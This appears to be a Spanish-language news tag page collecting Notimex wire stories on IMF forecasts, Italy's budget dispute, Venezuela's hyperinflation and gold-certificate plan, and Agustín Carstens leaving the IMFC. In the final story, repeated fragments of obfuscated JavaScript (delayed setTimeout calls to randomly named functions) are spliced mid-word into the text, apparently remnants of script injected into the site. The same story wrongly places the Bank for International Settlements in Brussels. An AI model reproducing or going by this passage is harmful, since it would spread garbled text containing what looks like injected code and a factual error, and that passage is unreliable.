Etiquetas: Fondo Monetario Internacional


Advierte Gobierno italiano que no cambiará su programa económico

10 octubre, 2018

Roma. El gobierno italiano reiteró hoy que no cambiará su programa económico y presupuestario que prevé un aumento del gasto público, pese a que el Fondo Monetario Internacional (FMI) considera al país un riesgo para el sistema financiero global.

“El gobierno considera oportuno confirmar las previsiones contenidas en la nota de actualización del DEF (Documento de Economía y Finanza)”, declaró hoy el ministro de Economía, Giovanni Tria.

En una comparecencia ante la comisión de Presupuesto de la Cámara de diputados y del Senado, Tria reconoció que existe preocupación ante el aumento de prima de riesgo de la deuda tras el anuncio del presupuesto, que prevé llevar el déficit público al 2.4 por ciento del Producto Interno Bruto (PIB).

El incremento de la prima de riesgo de la deuda, dijo, “crea ciertamente preocupación pero quiero reiterar que se trata de una reacción excesiva, no justificada por los fundamentales de la economía y las finanzas públicas italianas”.

“No debemos dejar que la volatilidad a corto plazo de los mercados ofusque nuestra capacidad de formular evaluaciones y previsiones equilibradas”, añadió.

En el mismo sentido se manifestó el viceprimer ministro y titular del Interior, Matteo Salvini, líder de la Liga, el partido que en alianza con el Movimiento 5 Estrellas sostiene al gobierno.

“No cambiaremos el presupuesto porque así lo quieren la Unión Europea y el Banco de Italia”, señaló Salvini a la televisora pública RAI.

La víspera el Banco de Italia consideró que las previsiones del DEF de que en 2019 se alcanzará un crecimiento del PIB del 1.5 por ciento son “demasiado optimistas” y consideró que el aumento será al máximo del 0.9 por ciento.

Por su parte, el FMI advirtió en su reciente reporte sobre la estabilidad financiera global que Italia, con una deuda pública de más del 130 por ciento del PIB, es un factor de riesgo para el sistema financiero global.

En tanto, la prima de riesgo de la deuda o diferencial del rendimiento a pagar por los títulos de Estado italianos y los alemanes usados como referencia se mantenía en torno a los 300 puntos base, su mayor nivel desde 2014.

Fuente: Notimex


Venezuela pone en marcha plan de ahorro en oro

5 septiembre, 2018

Caracas. El gobierno venezolano puso en marcha esta semana un plan de ahorro en oro a fin de financiar un programa que busca reanimar la economía azotada por la recesión y la hiperinflación, y que obligó al éxodo de miles de venezolanos a países vecinos.

El brillo del oro deslumbra en cualquier escenario, pero con una hiperinflación embistiendo el ahorro de los venezolanos, el plan genera una alta incertidumbre.

Maduro lanzó la oferta como parte de su programa de recuperación económica, que no cuenta con financiamiento externo o de organismos multilaterales, por lo que necesita captar recursos del circuito interno.

Además de obtener fondos para destinarlos a las debilitadas a áreas sociales, el gobierno espera retirar dinero circulante para contener la hiperinflación, que este año escalará a un millón por ciento, según el Fondo Monetario Internacional (FMI).

Maduro inició el plan comprando una de las dos opciones de oferta: certificados de 1,5 gramos por 3.502 bolívares, unos 57,51 dólares oficiales, y 2,5 gramos por 5.837 bolívares o 95,86 dólares.

El lunes 3 de septiembre fue el primero en hacer efectiva la compra de 1,5 gramos, a cambio del cual recibió un certificado.

Al promover su programa, Maduro habló indistintamente de “ahorro” e “inversión”, pero ambos términos se aplican en un fase hiperinflacionaria en la que los venezolanos destinan sus ingresos casi exclusivamente para comprar alimentos escasos y con precios inflados.

“Acabo de comprar este certificado de ahorro por un lingotico de 1,5 gramos. Yo me llevo el certificado y el lingote quedará resguardado en las bóvedas del Banco Central de Venezuela (BCV)”, anunció Maduro luego de la transacción.

De ninguna manera los compradores verán el brillo del oro en sus manos, pues el mineral estará reservado en las bóvedas del Banco Central de Venezuela (BCV), que entregará a cambio un certificado.

A primera vista, el plan luce atractivo, ya que la mayoría de los venezolanos desconoce lo que es ahorrar legalmente en divisas duras por el control de cambios, vigente hace más de 15 años.

Al promover la oferta, Maduro afirmó que “el oro vale siempre lo mismo o vale más, nunca menos. Así que el oro venezolano está para sustentar el nuevo plan de ahorro”.

La página del Consejo Mundial del Oro (World Gold Council) señala que entre septiembre de 2011 y agosto de 2018, el precio internacional del metal ha sostenido un registro constante de pérdida, al pasar de 1.821 a 1.216 dólares por onza.

La venta de oro en países de economías estables forma parte de un abanico de inversiones, pero en naciones con hiperinflación funciona como un respaldo ante embargos.

Analistas rechazan hacer cálculos sobre los recursos que podría obtener el gobierno con el proyecto, ya que dependerá de la capacidad que tengan los ahorristas para destinar dinero para la inversión.

El principal apremio económico del gobierno es la escasez de divisas, provocada por una combinación de gastos desbocados en años anteriores, pago puntual de la deuda externa, debilidad del precio del barril petrolero y la caída de la producción de crudo.

Venezuela llegó a importar al año hasta 60.000 millones de dólares en los últimos años de gobierno del extinto mandatario Hugo Chávez, quien murió en 2013, un monto que cayó a 12.000 millones en 2017.

Maduro dijo que el ahorro en oro estará dirigido especialmente a los pensionados y caja de ahorro de trabajadores, dos sectores severamente afectados por la embestida de la hiperinflación.

El analista Alejandro Grisanti, de la firma Ecoanalítica, calificó el plan como una “fantasía” del gobierno.

“El problema es que los venezolanos no lucen capacidad de ahorro”, dijo a Notimex. “Al gobierno le gusta vivir de fantasía en lugar de ajustarse”, agregó.

Indicó que al mismo tiempo del plan de ahorro en oro, Maduro anunció un programa de venta del Petro, la criptomoneda que creó el gobierno para enfrentar las sanciones financieras de Estados Unidos.

“En este mes no ha habido transacciones con Petro, que no existe como criptomoneda”, aseveró.

El economista Luis Zambrano dijo que con la oferta de los pequeños lingotes de oro el gobierno estaría buscando financiamiento.

“El BCV dará un certificado de tenencia en oro y ellos tendrán los activos (dinero) de lo que inviertas. El gobierno lo que estaría buscando es financiarse con los mismos bolívares que está lanzando al mercado para bajar la masa monetaria”, afirmó.

El llamado Programa de Recuperación económica de Maduro comenzó el 20 de agosto con la circulación de la nueva familia de billetes del bolívar soberano,  producto de la eliminación de cinco ceros al bolívar fuerte.

Además, aprobó un aumento drástico del salario mínimo nacional, de 50 a 1.800 bolívares (menos de 30 dólares), el aumento de los impuestos y el inminente incremento de la gasolina, que de ser la más barata del mundo pasará a venderse a precios internacionales.

Fuente: Notimex


Vive Venezuela hiperinflación no vista en el mundo en la historia reciente

24 julio, 2018

Caracas. Venezuela, el país con las mayores reservas probadas de petróleo, padece una severa crisis económica que se traduce en escasez alimentos básicos y medicinas, así como en una hiperinflación no vista en el mundo en la historia reciente.

La gran preocupación macroeconomíca es la hiperinflación fuera de control, en la que los precios aumentan rápidamente al mismo tiempo que la moneda pierde su valor real y la población tiene una evidente reducción de su capacidad de pago de sus bienes y servicios.

Sobre este tema, Alejandro Werner, director del Departamento del Hemisferio Occidental del Fondo Monetario Internacional (FMI), señaló la hiperinflación venezolana es algo que pocas veces se ha visto en la historia reciente. “La situación es similar a la de Alemania en 1923 o Zimbabwe en 2008”.

En este sentido, el FMI proyectó este lunes una inflación anual de hasta un millón por ciento en Venezuela, y señaló que la magnitud de la crisis puede aumentar las consecuencias migratorias para los países vecinos.

Los precios en el país latinoamericano hace tiempo que están descontrolados y el dinero pierde valor a una velocidad trepidante.

En abril, el FMI estimó que Venezuela cerraría el año con una inflación de más del 13 mil por ciento, algo ya desmesurado. Tres meses después, el organismo acaba de revisar esa cantidad a un millón por ciento.

La incertidumbre es máxima y el Fondo no descarta más cambios en la proyección. Pero “la destrucción del sistema de precios ya está hecha”, manifestó Werner, responsable del seguimiento de la evolución económica de América Latina y el Caribe.

Werner explicó que, a efectos prácticos, la diferencia entre una inflación de un millón por ciento o un 1.2 millones por ciento ya no se aprecia porque la destrucción del sistema de precios como mecanismo de asignación de recursos ya está hecha.

“Ese número surge de cálculos técnicos generados por nuestro staff”, aunque incluye un grado de incertidumbre “mayor al que puede tener una proyección de algún otro país” con inflación menor, explicó Werner.

El FMI prevé además que el gobierno de Nicolás Maduro siga “registrando grandes déficits fiscales, financiados exclusivamente con la expansión de la base monetaria, lo cual seguirá alimentando la aceleración de la inflación a medida que la demanda de dinero siga desplomándose”.

Sumida en una profunda crisis política, institucional y económica que hace ya tiempo que ha devenido también en humanitaria, Venezuela se ha convertido en uno de los pocos países en la reciente historia mundial en los que el PBI (Producto Interior Bruto) se ha contraído en torno al 50 por ciento en los últimos cinco años.

El derrumbe este año será del 18 por ciento según el FMI, el tercero consecutivo de dos dígitos, a causa de la reducción significativa de la producción de petróleo y las distorsiones generalizadas a nivel micro, que se suman a los grandes desequilibrios macroeconómicos.

En 2016, la economía venezolana se contrajo 16.5 y el año pasado, el 14. Ya en abril pasado, Werner había calificado la crisis en Venezuela como una de las mayores en la historia de la economía moderna.

“El colapso de la actividad económica, la hiperinflación y el deterioro cada vez más grande de la oferta de bienes públicos (salud, electricidad, agua, transporte y seguridad), junto con la escasez de alimentos a precios subsidiados, generaron grandes flujos migratorios, que intensificarán los efectos de contagio a países vecinos”, advirtió el FMI.

El gobierno de Maduro no reconoce faltas propias por la crisis y acusa del descalabro nacional a Estados Unidos y una supuesta “guerra económica” orquestada por el empresariado local.

Fuente: Notimex


Estima FMI un declive en la economía mexicana para 2019 por incertidumbre del TLCAN

16 julio, 2018

Ciudad de México. Debido a  la incertidumbre en torno a la renegociación del Tratado de Libre Comercio de América del Norte (TLCAN), el Fondo Monetario Internacional estimó que la economía de México crecerá 2.3 por ciento durante este 2018, con lo que mantuvo su previsión hecha en abril. Para 2019, pasó de 3 a 2.7 por ciento.

De acuerdo con el organismo, la perspectiva de crecimiento de la economía mexicana se ve empañada por las tensiones comerciales y la prolongada incertidumbre que rodea la renegociación del Tratado de Libre Comercio de América del Norte (TLCAN), así como por el programa de políticas del nuevo Gobierno, el cual estará encabezado por el virtual presidente electo, Andrés Manuel López Obrador.

Consideró que esos factores y las tensiones comerciales a nivel global también afectarán el crecimiento de la economía mexicana para 2019, por lo que prevé que sea de 2.7 por ciento, 0.3 por ciento menos que lo estimado en su informe anterior.

En su informe “Expansión menos uniforme, aumento de las tensiones comerciales”, el FMI destacó que el reciente aumento de los aranceles por parte de Estados Unidos, y las medidas de represalia por parte de los socios comerciales, aumentó la probabilidad de una escalada y de acciones comerciales sostenidas.

Lo anterior podría descarrilar la recuperación global y reducir las perspectivas de crecimiento a mediano plazo, por lo que decidió dejar en 3.9 por ciento su proyección de crecimiento mundial para 201y 2019.

“Nuestro modelo sugiere que si se concretan las amenazas actuales a la política comercial y la confianza empresarial cae como resultado, la producción mundial podría estar alrededor de 0.5 por ciento por debajo de las proyecciones actuales para el 2020”, resaltó en un comunicado el economista jefe del FMI, Maury Obstfeld.

“Como foco de represalias globales, Estados Unidos encuentra una parte relativamente alta de sus exportaciones gravadas en los mercados globales ante un conflicto comercial tan amplio, y por lo tanto es especialmente vulnerable”, agregó.

Las previsiones para Estados Unidos y China tampoco cambiaron, con un crecimiento de 2.9 por ciento en 2018 y de 2.7 por ciento en 2019 para la mayor economía del mundo, y una expansión de 6.6 por ciento para este año y en 6.4 por ciento para el próximo en el caso del gigante asiático.

No obstante, el FMI recortó las previsiones para el 2018 de algunos países de mercados emergentes. En particular bajó medio punto porcentual la proyección de crecimiento de Brasil, a 1.8 por ciento, debido a los efectos persistentes de huelgas laborales y la incertidumbre política.

El organismo también redujo la proyección de expansión para la zona euro este año a un 2.2 por ciento desde 2.4 por ciento, y para Reino Unido la recortó a 1.4 por ciento desde 1.6 por ciento. Disminuyó el pronóstico de expansión de Japón a uno por ciento desde 1.2 por ciento.


Pronostica FMI crecimiento económico mundial de 3.9%

17 abril, 2018

Washington. La economía global crecerá 3.9 por ciento este año y el próximo, apoyada por condiciones favorables en los mercados financieros y políticas a modo en este frente, y los efectos de las política fiscal en Estados Unidos, aseguró hoy el Fondo Monetario Internacional (FMI).

La proyección para este año significó una revisión al alza de 0.2 por ciento respecto a la estimación dada a conocer en octubre pasado, lo que reflejó el positivo efecto del repunte experimentado a partir del segundo semestre de 2017.

A diferencia de años recientes, las economías avanzadas registrarán un crecimiento fuerte, si bien las emergentes y en desarrollo continuarán aportando el mayor impulso a la actividad, está vez teniendo como epicentro a India, ante la desaceleración que experimentará China.

En su nuevo reporte Perspectivas Económicas Mundiales (WEO), dado a conocer hoy en la víspera de su reunión anual de primavera, el FMI dijo que más allá de situaciones como un drástico endurecimiento de las condiciones financieras, los riesgos se mantienen balanceados.

Consideró que la recuperación que experimenta la mayoría de las economías, ofrece una ventana de oportunidad para continuar impulsando las políticas y reformas que permitan elevar el crecimiento de mediano plazo, antes los prospectos de una desaceleración en el corto plazo.

“Los prospectos se mantienen favorable en las economías emergentes de Asia y Europa, pero enfrentan retos en América Latina, el Medio Oriente y el Subsahara de África”, donde pese a cierta recuperación, las expectativas de medio término para los exportadores de materias primas siguen contenidas en general, dijo.

El Fondo estimó que la decisión de Estados Unidos de imponer tarifas sobre las importaciones de acero y aluminio, y la represalia de China, junto al potencial de que otros países respondan de manera similar, “eleva las preocupaciones en este sentido y amenaza con dañar la actividad doméstica y global”.

Agregó que otros riesgos también incluyen un empeoramiento de las tensiones geopolíticas, en lo que pareció ser una alusión a las crisis en Siria y Corea del Norte.

El crecimiento en las economías avanzadas estará encabezado por Estados Unidos, donde se anticipa una expansión de 2.9 por ciento este año y 2.7 por ciento para 2019, seguido por Canadá, con 2.1. y 2.0 por ciento de manera respectiva.

En la zona del Euro, España se colocará con el mejor desempeño, creciendo a tasas de 2.8 y 2.2 por ciento este y el próximo año, superando ligeramente a Alemania, donde la perspectiva del fondo apunta a una expansión de 2.5 por ciento para 2018 y de 2.0 por ciento para 2019.

En las economías emergentes y en desarrollo, India marcará la pauta, de manera particular en Asia, con un crecimiento proyectado de 7.4 por ciento este año y de 7.8 por ciento el siguiente, frente a la desaceleración en China, donde el fondo anticipa tasas de 6.6 y 6.4 por ciento para este y el próximo año, de manera respectiva.

En la región del Subsahara africano, el reporte colocó a Nigeria con uno de los mejores desempeños, creciendo 2.1 por ciento este año y 1.9 por ciento en 2019, seguido por Sudáfrica, donde se proyectan tasas de 1.5 y 1.7 por ciento de manera respectiva.

Fuente: Notimex


Dejará Carstens Comité Monetario del FMI el 1 de diciembre

15 noviembre, 2017

Washington. El Fondo Monetario Internacional (FMI) oficializó hoy que el mexicano Agustín Carstens dejará la presidencia del Comité Monetario y Financiero Internacional (CMFI) de dicho organismo a partir del 1 de diciembre.

Christine Lagarde, directora gerente del FMI, destacó que bajo la presidencia de Carstens, el IMFC desempeñó un papel clave en el asesoramiento y orientación al FMI y la comunidad internacional.

Resaltó que Carstens contribuyó a “asegurar la estabilidad económica y financiera mundial y a promover un crecimiento fuerte, sostenible e inclusivo”.

En un comunicado, Lagarde señaló que durante su mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ato, el CMFI también reafirmó “el papel fundamental que desempeña el FMI en el centro del sistema monetario y financiero internacional”.

“Estoy agradecida por el servicio de Agustín al FMI y su membresía, y lo felicito por su liderazgo sobresaliente y su gran dedicación a la cooperación internacional”, apuntó.

La renuncia será efectiva el mismo día que Carstens deje de ser gobernador del Banco de México. Asumirá después la gerencia general del Banco de Pagos Internacionales (BIS), en Bruselas.

Carstens fue nombrado al frente del CMFI en marzo de 2015. El proceso de selección de un nuevo presidente será puesto en marcha en breve.

Fuente: Notimex